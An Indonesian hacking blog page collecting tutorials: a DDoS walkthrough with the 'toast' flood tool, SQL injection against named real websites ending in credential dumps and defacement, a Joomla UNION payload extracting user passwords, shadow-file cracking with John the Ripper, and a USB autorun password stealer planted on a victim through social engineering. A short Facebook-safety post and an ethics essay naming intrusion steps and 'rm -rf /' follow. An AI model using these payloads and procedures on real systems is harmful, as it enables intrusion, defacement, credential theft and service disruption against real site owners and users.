Belajar Hacking

tutorial hacking, tools hacking, free tools, hacking, deface, facebook hacking, hack FB, gratis software, artikel hacking, cara hacking


ShoutMix chat widget

Counter

Google translate

Sponsored


Masukkan Code ini K1-EBD4CE-A
untuk berbelanja di KutuKutuBuku.com Ranking Search Engine
free counters

Alexa Siteinfo

Submit Your Site To The Web's Top 50 Search Engines for Free!
Search Engine Optimization and SEO Tools Sonic Run: Internet Search Engine

sms gratis ke semua operator

Followers

DDoS Under LinuX Console

DDoS Under LinuX Console

Ddos mungkin teman kalian udah sering dengar hal ini, ini merupakan tekhnik
pengiriman paket data yang banyak ke dalam suatu jaringan, biasanya pada Ddoser
ini punya tujuan masing masing kenapa dia melakukanya,. Dari pada banyak Omong
mending langsung mulai z yahh pembahasannya..!!
Di sini kita memerlukan sebuah tool opensource buatan GrindMark, jadi mari kita
download toolnya, sekarang ke linux console yahh

ketik : wget http://packetstormsecurity.org/DoS/toast.0.2.tgz
Setelah itu extract file tersebut
ketik : tar -xzvf toast.0.2.tgz; cd /toast
Kita udah masuk ke dir toast sekarang, masukan command lagi
ketik : ls
ATTACK bin EXPLAIN README src toast.sh

Nah di atas merupakan isi file dari toast itu sendiri, nah kita test target kita
sekarang
Karena gw coba sesame jaringan jadinya tinggal cek z ipnya

Ping ke 192.168.2.34
Replynya kayak gini :
64 bytes from 192.168.13.53: icmp_seq=1 ttl=63 time=6.60 ms
64 bytes from 192.168.13.53: icmp_seq=2 ttl=63 time=0.580 ms

Wow lancar juga yahh, heheheh ( tunggu di ddos pasti g lancar,kwkakakka )
Kita lihat dulu filenya

# cat ATTACK
Attack listing
1 = Syn floods
2 = Udp floods
3 = Port floods
4 = Linux attacks
5 = BSD attacks
6 = Windows 95 attacks
7 = Windows 98/2000/NT attacks
8 = Automatic attack selection (Install queso, good with -s)
9 = All Attacks


Wow di sana udah tersedia jenis floods, mantap deh sekarang kita coba attack ke
target kita, hehhehe :
Sekarang kita attack targetnya..!!

# ./toast.sh 192.168.2.99 192.168.13.34 -s 9

Di atas merupakan command dari toast
Keterangan :

./toast < pilihan di list>

Nah lihat hasil ping dari targetnya

64 bytes from 192.168..34: icmp_seq=41 ttl=63 time=0.635 ms
64 bytes from 192.168.234: icmp_seq=43 ttl=63 time=207 ms ===> perubahan
64 bytes from 192.168.2.34: icmp_seq=44 ttl=63 time=16 ms ===> perubahan
64 bytes from 192.168.2.34: icmp_seq=45 ttl=63 time=0.618 ms ===>
perubahan

Perubahannya boleh juga tuh,. Di sini penulis mempraktekannya dalam satu jaringan
LAN dengan OS Backtrack sebagai attackernya.
Toast hanya berjalan di platform linux, jadi untuk windows belum ada.

Penggunaan SQLiX with Backtrack 3

Penggunaan SQLiX with Backtrack 3

SQLiX adalah tool penganalisa vulnerability sebuah aplikasi web yang menggunakan database keluarga SQL (MySQL, MSSQL,...) di backend-nya terhadap serangan SQL Injection.

Option untuk test pertama sih biasanya ane pake seperti ini:
root@v87:/pentest/database/SQLiX# ./SQLiX.pl -all -agent mozilla/5.0 -v=3 -url="http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999"
======================================================
-- SQLiX --
© Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URL [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999]
http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999
[+] working on HTTP User Agent
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[DEBUG] Page Y is NOT static ==> 4dTW01Ay/qZas5eddO4Xog
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind Statement Injection
[DEBUG] Page Y is NOT static ==> 25SLzYsMx3gUPWm7Ul8lYw
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind String Injection
[DEBUG] Page Y is NOT static ==> zh6vOvw0YinhgixLCdB0Bg
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] working on cat
[+] Method: MS-SQL error message
[+] Method: SQL error message
[FOUND] Match found INPUT:['] - "You have an error in your SQL syntax"
[INFO] Error with quote
[FOUND] SQL error message

RESULTS:
The variable [cat] from [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999] is vulnerable to SQL Injection [Error message (') - MySQL].


Oke sekarang kita udah tau kalo target kita ini vulnerable terhadap SQL Injection dengan metode sqlerror message (dengan single quote ') <-- yeah ini memang vulnerability model jadul, tapi lumayan buat contoh!

gratz : indobacktrack.or.id

SQl Inject dengan SQLi Helper 2.7

Di topik ini saya akan menjelaskan gimana cara SQlinject dengan tool SQLi Helper v 2.7
Setelah mempelajari kemungkinan tidak 100% mengerti , silahkan diskusi aja soalnya gw jg bingung cara makenya gimana :lol: .
gw cuma translate tutorial ini ke bahasa indonesia yang gw temuin dalam bahasa ingris.

Ingat! tidak semua website bisa di inject!

Step 1

Download SQLi Helper 2.7
http://www.mediafire.com/?g5yy225x3dt

Step 2

Carilah website yang bisa di inject, carilah website yang berakhiran "article.php?id=[nomor]"

contoh:
http://encycl.anthropology.ru/article.php?id=%271

perhatikan pada nomor terakhir "1"

saat kamu click link itu ada akan menemukan pesan error di website itu
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

Artinya website itu bisa di inject, karena anda mendapatkan error

Step 3

Buka SQLi Helper 2.7 yang sudah di download
Step 4

Masukan link di dalam target, dan setelah itu click "Inject"


Setelah itu biarkan hacking tool itu bekerja mencari column.
Semakin cepat internet anda semaking cepat proses nya.

Setelah selesai anda akan mendapatakan ini

Step 5
Stelah semua selesai pencet "Get Database"

Step 6

Pilihlah salah satu elemen dari database dan tekan "Get Tables"

Step 7
pilihlah salah satu elemen dari table dan tekan "Get Columns"

Step 8
Pilih elemen "usr_login" dan "usr_pass" lalu pencet "Dump Now"

Step 9
Setelah click "Dump now" anda akan menemukan code2 yang ga masuk akal ,

copy code itu ke http://www.md5crack.com/ untuk di ubah ke username/password

Step 10
Sekarang anda tinggal mencari admin cpanel dan login terus DEFACE.


Selamat Hacking

sumber tecon-crew.org
♀ ASP INJECTION ♀

♀ ASP INJECTION ♀

langsung yak .. eng ing eeenggggg....

1. cari target di google dengan keyword : default.asp?newsID=4352 ( contoh aja masih banyak kok yang lain)

2. uda dapet? contohnya : http://www.pyyr.gov.cn/new_show.asp?id=8887

3. cek bisa di injek apa gak dgn cara tambah kan tanda ‘ di akhir URL

http://www.pyyr.gov.cn/new_show.asp?id=8887′

klo errornya gini
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号

/new_show.asp,行 89

maka lanjutkan perjuangan mu ok

4. Buat mencari bugnya gunakan having 1=1

http://www.pyyr.gov.cn/new_show.asp?id=8887 having 1=1

maka mucul pesan akan eror
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/new_show.asp,行 89


5. Uda ketemu kan coloumnya? itu tuh main.id

6. trus http://www.pyyr.gov.cn/new_show.asp?id=8887 group by main.id having 1=1;–

maka muncul pesan error :
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/new_show.asp,行 89

7. Uda ketemu kan titlenya ini nih main.title langsung aja update

http://www.pyyr.gov.cn/new_show.asp?id=8887 update main set title=’hacked by YOU’

diperhatiin kolomnya jangan ampe salah ya.

klo uda tinggal buka aja homenya

Jreeeng news smua berubah jadi Hacked by YOU,..terserah si mau hacked by you..mau defaced by you..mau eek kek fuck u admin mau security is null.. mau makan bakso kek apaan kek.. sok aja di coba kalo bisa :lol:
masalahnya ini bug lama :lol:

semoga beruntung aja :lol:

thanks to anak|jendral, Ronald_Pa1000, bang Jo2, bang Hmei7

sumber tecon-crew.org

exploit joomla

exploit joomla

pertama qta buka paman qta bersama :) mang google
nah lalu masukin deh dork nya kya gini
Quote:
inurl:com_idoblog

misal qta dapet target kaya gini
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=viewpost&id=49
dah gtu qta cari deh gambar atw nama orang yg posting tu blog........ klw da gambar biasany waktu pointer mos di set disana da pilihan userblog dengan profile qta klik yg profile.................
tpi untuk contoh yg sya berikan ini sya memilih userblog, karena ketika sya pilih profile component nya berubah menjadi bukan idoblog :)
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=userblog&userid=66&Itemid=
setelah url menjadi seperti itu qta lakukan sedikit modifikasi :D
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=profile&userid=66&Itemid= menjadi seperti ini
lalu qta masukan exploit nya yg sya dapat dari milw0rm

+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

sehingga url berubah menjadi seperti ini [url]http://xtiara.boengamas.com/index.php?option=com_idoblog&task=profile&userid=66+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
&Itemid=[/url]
jika beruntung maka akan keluar username dan password tinggal cari crack joomla nya

sekian dlu tulisan panjang lebar dari nubie ni somaga dapat membantu


sumber Tecon-crew.org
Tips mengamankan FB dari para cracker jail...

Tips mengamankan FB dari para cracker jail...

sesuai permintaan teman2 saya, akhirnya saya buat artikel ini....
saya hanya membuat beberapa tips berdasarkan pengetahuan dan pengalaman saja...
so kalau ada yang kurang maafinnya.... maklum newbie abis....
oke gk perlu panjang lebar lagi berikut beberapa tips dari saya....

1. jangan tampilkan alamat email anda di profil anda sehingga orang lain tidak dapat mengetahui email anda, logikanya orang biasanya klu ngehack account FB menggunakan tehnik Social Enginering atau dalam arti lain bobol password pake tebak2an gitu dech... jadi dia pasti bobol email kamu dulu baru dech masuk FB situ....

2. keylogger.... semua pasti udah tau apa itu keylogger, keylogger itu adalah sejenis program yang merekam semua kegiatan keyboard, jadi klu kita ngetik apa aja pasti ketahuan...

3. FakeLogin (tampilan login Fb palsu) ini juga dah sering terjadi... biasanya tricknya itu adalah kita dikirimi pesan oleh si orang yang jail yang ngaku admin FB terus kita di suruh masuk link yang dia bikin.... dan biasanya di alamat link tersebut akan muncul tampilan login FB yang sangat mirip padahal itu semua buatan si jail tersebut... jadi hati2 klu buka Fb cukup ketik aja www.facebook.com jangan ada embel2 lain...

4. menggunakan beberapa software hacking.... tapi software ini biasanya membutuhkan kamus password yang berisi jutaan kata yang biasa oleh para pengguna internet di jadikan password..


5. tambahkan lebih dari satu email di kontak Fb kamu... terus setting supaya semua email mendapat pemberitahuan kalau ada perubahan password atau lainnya....

semoga semua tips dari saya ini bermanfaat....
yang terpenting satu yang saya mau beritahu kalau FB tuch bukan segalanya... jadi kalau Fb kamu ke Hack gk usah dibawa pusing oke...

""cara diatas hanya efektif buat hacker kelas newbie and lamers... kalau yang udah advance sorry ya, aku gk bisa bantu apa2... hehehe""


Tutorial John The Ripper

Tutorial John The Ripper

Kita akan menggunakan cara kuno untuk mendapatkan password root dan
seluruh
password user yang ada di sebuah shell, disini penulis menggunakan
Paman John
Versi 1.6 untuk Unix, kalian bisa mendownload nya di:
http://www.openwall.com/john/dl/john-1.6.tar.gz
nah sekarang kita buka ke shell ( penulis menganggap kalian sudah
memiliki shell)
kalo kalian ingin praktis, saat kalian nge-root dan sudah mendapatkan
access root
terserah kalian mo pasang backdoor, atau mengupload passwd dan shadow
untuk dicrack
biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow
sekarang go to the point :
[root@localhost tmp]# wget
http://www.openwall.com/john/dl/john-1.6.tar.gz
[root@localhost tmp]# ls -a
. radsess.13217 radsess.15352 radsess.26504
.. radsess.13221 radsess.15377 radsess.26508
.bash_history radsess.13252 radsess.15505 radsess.26516
.bash_logout radsess.13257 radsess.15509 radsess.26520
.bash_profile radsess.13261 radsess.15510 radsess.29908
.bashrc radsess.13262 radsess.15517 radsess.29909
.emacs radsess.13269 radsess.15521 radsess.29935
.gtkrc radsess.13273 radsess.15525 radsess.29940
.kde radsess.13277 radsess.15627 radsess.29946
.screenrc radsess.13278 radsess.15631 radsess.30573
.webmin radsess.13287 radsess.15632 radsess.30577
john-1.6.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@localhost tmp]# tar -zxvf john-1.6.tar.gz
john-1.6/src/AFS_fmt.c
john-1.6/src/BF_fmt.c
john-1.6/src/BF_std.c
john-1.6/src/BSDI_fmt.c
john-1.6/src/DES_bs.c
...
...
...
john-1.6/doc/OPTIONS
john-1.6/doc/README
john-1.6/doc/RULES
john-1.6/README
udah selesai dicompile kita cek, folder paman john kita yang tercinta

[root@localhost tmp]# ls -a
[root@localhost tmp]# ls -a
. radsess.13213 radsess.15348 radsess.26500
.. radsess.13217 radsess.15352 radsess.26504
.bash_history radsess.13221 radsess.15377 radsess.26508
.bash_logout radsess.13252 radsess.15505 radsess.26516
.bash_profile radsess.13257 radsess.15509 radsess.26520
.bashrc radsess.13261 radsess.15510 radsess.29908
.emacs radsess.13262 radsess.15517 radsess.29909
.gtkrc radsess.13269 radsess.15521 radsess.29935
.kde radsess.13273 radsess.15525 radsess.29940
.screenrc radsess.13277 radsess.15627 radsess.29946
.webmin radsess.13278 radsess.15631 radsess.30573
john-1.6 radsess.13287 radsess.15632 radsess.30577
john-1.6.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@localhost tmp]# cd john-1.6
setelah kita masuk...kita langsung cari folder src
[root@localhost john-1.6]# ls -a
. .. README doc run src
[root@localhost tmp]# cd src
[root@localhost tmp]# ls -a
[root@localhost tmp]#
. alpha.h formats.h mips32.h single.c
.. batch.c getopt.c mips64.h single.h
AFS_fmt.c batch.h getopt.h misc.c sparc.S
.........
.........
Makefile detect.c math.c rules.c x86-mmx.h
Makefile.dep external.c math.h rules.h x86.S
alpha-4k.h external.h memory.c signals.c
alpha.S formats.c memory.h signals.h
kita compile dulu, dan liat jenis mesin yang ada
[root@localhost src]# make
To build John the Ripper, type:
make SYSTEM
where SYSTEM can be one of the following:
linux-x86-any-elf Linux, x86, ELF binaries
linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries
....
....
win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX
win32-cygwin-x86-k6 Win32, Cygwin, AMD K6
generic Any other UNIX system with gcc
[root@localhost src]# make generic
rm -f arch.h
gcc -c -Wall -O2 -fomit-frame-pointer detect.c
gcc -s detect.o -o detect
./best.sh "make" \
"DES_fmt.o DES_std.o" \
"MD5_std.o" \
"BF_std.o"
Compiling: DES benchmark (code version #1)
make[1]: Entering directory `/tmp/john-1.6/src'
gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c
sed "s/unsigned long/ARCH_WORD/" nonstd.c > DES_bs_s.c
...
...
sampai muncul kata /run/unshadow
sampai muncul kata /run/unique
sampai muncul kata /run/unafs ...pokonya gitu lah..pasti tau dong kalo
selesai
compile kaya apa
abis itu kita menuju ke folder run di direktory paman john
[root@localhost src]# cd ..
[root@localhost john-1.6]# cd run
[root@localhost run]# ls -a
. digits.chr lanman.chr unshadow
.. john mailer unafs
alpha.chr john.pot passwd.1st unique
kaya gitu lah kira2 munculnya
setelah itu kita cari letak passwd dan shadow
[root@localhost run]# whereis passwd
passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD
/usr/share/man/man1/passwd.1.gz
/usr/share/man/man5/passwd.5.gz
tuh ada tuh /etc/passwd
kemudian gunakan cara yang sama utk shadow ~ penulis telah mencoba
beberapa shell
dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow
passwd emang bisa diread oleh siapa saja, sedang shadow tidak
bisa..diperlukan
access root untuk mengambil 2 data tersebut, sebab passwd dan shadow di
encryptsi
nah sekang kita masuk ke tahap untuk mendecrypt password, alias CRACK
PASSWORD
[root@localhost run]# ./unshadow /etc/passwd /etc/shadow > passwd.1
maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama
passwd.1
[root@localhost run]# cat passwd.1
root:$1$ÚÍA5öwMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2: daemon:/sbin:/sbin/nologin
adm:*:3:4/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
....
johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash
chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500: :/home/chrisl:/bin/bash
turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash
williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:50 0::/home/williams:/bin/bash
Setelah itu kita jalankan berbagai macam perintah Paman John
contohnya : 1. menggunakan -i:alpha
[root@localhost run]# ./john -i:alpha passwd.1 &
maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin
aja
selama paman john mengcrack password untuk kita, kita bisa ngeroot
ntar dia muncul kaya gini kalo berhasil
[root@localhost run]# ./john -i:alpha passwd.1 &
Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K])
watson (root)
johnl s u m m e r
2. menggunakan -single <== kita menggunakan paman john secara
powerfull
emang agak lambat tapi dia secara teliti mengeck passwordnya
[root@localhost run]# /john -single passwd.2

3. kita ingin mengecrack password root / user saja

[root@localhost run]# ./john -i:alpha -user:0 passwd.1
atau
[root@localhost run]# ./john -i:alpha -user:500 passwd.1
untuk mengecek hasil password yang kita crack, dapat menggunakan
[root@localhost run]# ./john -show passwd.1
[root@localhost run]# ./john -show passwd.3
root:watson:0:0:root:/root:/bin/bash
coda:tools:500:500:CODA Manager:/home/coda:/bin/bash
adam:myrtle:501:500::/home/adam:/bin/bash
herschel:chester:502:500::/home/herschel:/bin/bash
johnl504:500::/home/johnl:/bin/bash
chrisl:turtle:505:500::/home/chrisl:/bin/bash
turner:account:506:506::/home/turner:/bin/bash
williams:ronald:507:500::/home/williams:/bin/bash

8 passwords cracked, 1 left
artinya user root memiliki password watson
user coda memiliki password tools
user adam memiliki password myrtle
masih banyak yang lain sih
ini hanya saya tulis ulang...jadi jika ada yang salah mohon dimaafkan

credit dari kompie servisan juga,,,,
soalnya tutor2nya ada banyak,,,,

Thanks for Edelweize

Mencuri Password Lewat Flash Disk

Mencuri Password Lewat Flash Disk

pas lagi surfing di google.eh nemuin tutorial ini,share2 aja
note:gw cuma membagikan,ne bukan trik gw biasalah...nubie 4ever
ok ne ....

Tools?
Hardware: USB (Flash disk)
Software: http://rapidshare.com/files/209422705/maling.rar

How to use?
- Extract file ke root USB
- Unplug USB dari PC/laptop lo
- Pergi samperin korban yang lagi pake laptop. Bilang gini: "Bro, ngopi bokep miyabi dunk, lagi sange nih"
- Masukin USBnya ke port laptop/pc korban
- Klik drive USB di My Computer
Note : jika autorun nya ga jalan, klik manual aja file tab.bat (pura-pura ke klik). Ato gmna ke caranya, yang penting tab.bat bisa ke klik
- Cabut USB. Bilang "Thanks ya bro" :lol:

Result?
-Buka lagi USB di laptop lo, klik folder "data", klo sukses ada 3 file didalemnya. Buka aja isinya satu2, klo dapet password situs bokep PM ya bro

Note:
- baru bs maling password di firefox,ym, ma email outlook. Kalo mo password2 yang lain tambahin aja sendiri
- bisa jadi file .exe (foxpass.exe,mailpass.exe,mspass.exe) ke detect sebagai virus. Dilaptop gw cuma mspass.exe yang kedetect ma Avira)[/url]

Belajar Jadi Hacker

Belajar Jadi Hacker

Belajar Menjadi Hacker




Google Search Results




You arrived here after searching for the following phrases:




Click a phrase to jump to the first occurrence, or return to the search results.




Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.


Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.



Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.


Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.


Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.


Dijelaskan oleh Front-line Information Security Team, ”Techniques Adopted By ’System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.



Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.


Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).


Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.


Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ’ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ’expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.


Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.


Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ’ps’ & ’netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.


Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ’root’ (administrator tertinggi di server).


Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ’clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ’backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.


Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ’rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.


Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ’rm -rf / &’.


Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.


Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.


Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, ”To boldly go where no one has gone before”.


Penulis: Onno W Purbo



Artikel Belajar Menjadi Hacker ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.
